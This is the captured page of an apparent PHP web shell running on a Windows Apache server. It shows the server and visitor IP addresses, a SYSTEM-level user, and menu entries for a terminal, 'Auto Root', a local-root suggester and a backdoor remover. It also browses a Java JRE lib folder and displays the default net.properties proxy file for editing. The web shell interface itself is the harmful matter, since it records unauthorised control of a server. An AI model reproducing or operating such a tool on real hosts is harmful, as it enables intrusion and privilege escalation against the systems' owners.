Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.140
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
Program Files (x86) /
Java /
jdk1.7.0_79 /
jre /
lib /
Delete
Unzip
Name
Size
Permission
Date
Action
applet
[ DIR ]
drwxrwxrwx
2023-10-12 23:53
cmm
[ DIR ]
drwxrwxrwx
2023-10-12 23:53
deploy
[ DIR ]
drwxrwxrwx
2023-10-12 23:53
ext
[ DIR ]
drwxrwxrwx
2023-10-12 23:53
fonts
[ DIR ]
drwxrwxrwx
2023-10-12 23:53
i386
[ DIR ]
drwxrwxrwx
2023-10-12 23:53
images
[ DIR ]
drwxrwxrwx
2023-10-12 23:53
jfr
[ DIR ]
drwxrwxrwx
2023-10-12 23:53
management
[ DIR ]
drwxrwxrwx
2023-10-12 23:53
security
[ DIR ]
drwxrwxrwx
2023-10-12 23:53
zi
[ DIR ]
drwxrwxrwx
2023-10-12 23:53
accessibility.properties
155
B
-rw-rw-rw-
2023-10-12 23:53
alt-rt.jar
168.72
KB
-rw-rw-rw-
2023-10-12 23:53
calendars.properties
1.2
KB
-rw-rw-rw-
2023-10-12 23:53
charsets.jar
3.48
MB
-rw-rw-rw-
2023-10-12 23:53
classlist
73.32
KB
-rw-rw-rw-
2023-10-12 23:53
content-types.properties
5.42
KB
-rw-rw-rw-
2023-10-12 23:53
currency.data
3.98
KB
-rw-rw-rw-
2023-10-12 23:53
deploy.jar
4.48
MB
-rw-rw-rw-
2023-10-12 23:53
flavormap.properties
3.84
KB
-rw-rw-rw-
2023-10-12 23:53
fontconfig.bfc
3.58
KB
-rw-rw-rw-
2023-10-12 23:53
fontconfig.properties.src
10.23
KB
-rw-rw-rw-
2023-10-12 23:53
javafx.properties
29
B
-rw-rw-rw-
2023-10-12 23:53
javaws.jar
881.92
KB
-rw-rw-rw-
2023-10-12 23:53
jce.jar
108.2
KB
-rw-rw-rw-
2023-10-12 23:53
jfr.jar
518.17
KB
-rw-rw-rw-
2023-10-12 23:53
jfxrt.jar
14.45
MB
-rw-rw-rw-
2023-10-12 23:53
jsse.jar
571.67
KB
-rw-rw-rw-
2023-10-12 23:53
jvm.hprof.txt
4.13
KB
-rw-rw-rw-
2023-10-12 23:53
launcher.exe
39.41
KB
-rwxrwxrwx
2023-10-12 23:53
logging.properties
2.4
KB
-rw-rw-rw-
2023-10-12 23:53
management-agent.jar
385
B
-rw-rw-rw-
2023-10-12 23:53
meta-index
2.08
KB
-rw-rw-rw-
2023-10-12 23:53
net.properties
3
KB
-rw-rw-rw-
2023-10-12 23:53
plugin.jar
1.85
MB
-rw-rw-rw-
2023-10-12 23:53
psfont.properties.ja
2.73
KB
-rw-rw-rw-
2023-10-12 23:53
psfontj2d.properties
10.15
KB
-rw-rw-rw-
2023-10-12 23:53
resources.jar
2.35
MB
-rw-rw-rw-
2023-10-12 23:53
rt.jar
57.35
MB
-rw-rw-rw-
2023-10-12 23:53
sound.properties
1.18
KB
-rw-rw-rw-
2023-10-12 23:53
tzmappings
7.95
KB
-rw-rw-rw-
2023-10-12 23:53
Save
Rename
############################################################ # Default Networking Configuration File # # This file may contain default values for the networking system properties. # These values are only used when the system properties are not specified # on the command line or set programatically. # For now, only the various proxy settings can be configured here. ############################################################ # Whether or not the DefaultProxySelector will default to System Proxy # settings when they do exist. # Set it to 'true' to enable this feature and check for platform # specific proxy settings # Note that the system properties that do explicitely set proxies # (like http.proxyHost) do take precedence over the system settings # even if java.net.useSystemProxies is set to true. java.net.useSystemProxies=false #------------------------------------------------------------------------ # Proxy configuration for the various protocol handlers. # DO NOT uncomment these lines if you have set java.net.useSystemProxies # to true as the protocol specific properties will take precedence over # system settings. #------------------------------------------------------------------------ # HTTP Proxy settings. proxyHost is the name of the proxy server # (e.g. proxy.mydomain.com), proxyPort is the port number to use (default # value is 80) and nonProxyHosts is a '|' separated list of hostnames which # should be accessed directly, ignoring the proxy server (default value is # localhost & 127.0.0.1). # # http.proxyHost= # http.proxyPort=80 http.nonProxyHosts=localhost|127.*|[::1] # # HTTPS Proxy Settings. proxyHost is the name of the proxy server # (e.g. proxy.mydomain.com), proxyPort is the port number to use (default # value is 443). The HTTPS protocol handlers uses the http nonProxyHosts list. # # https.proxyHost= # https.proxyPort=443 # # FTP Proxy settings. proxyHost is the name of the proxy server # (e.g. proxy.mydomain.com), proxyPort is the port number to use (default # value is 80) and nonProxyHosts is a '|' separated list of hostnames which # should be accessed directly, ignoring the proxy server (default value is # localhost & 127.0.0.1). # # ftp.proxyHost= # ftp.proxyPort=80 ftp.nonProxyHosts=localhost|127.*|[::1] # # Gopher Proxy settings. proxyHost is the name of the proxy server # (e.g. proxy.mydomain.com), proxyPort is the port number to use (default # value is 80) # # gopher.proxyHost= # gopher.proxyPort=80 # # Socks proxy settings. socksProxyHost is the name of the proxy server # (e.g. socks.domain.com), socksProxyPort is the port number to use # (default value is 1080) # # socksProxyHost= # socksProxyPort=1080 # # HTTP Keep Alive settings. remainingData is the maximum amount of data # in kilobytes that will be cleaned off the underlying socket so that it # can be reused (default value is 512K), queuedConnections is the maximum # number of Keep Alive connections to be on the queue for clean up (default # value is 10). # http.KeepAlive.remainingData=512 # http.KeepAlive.queuedConnections=10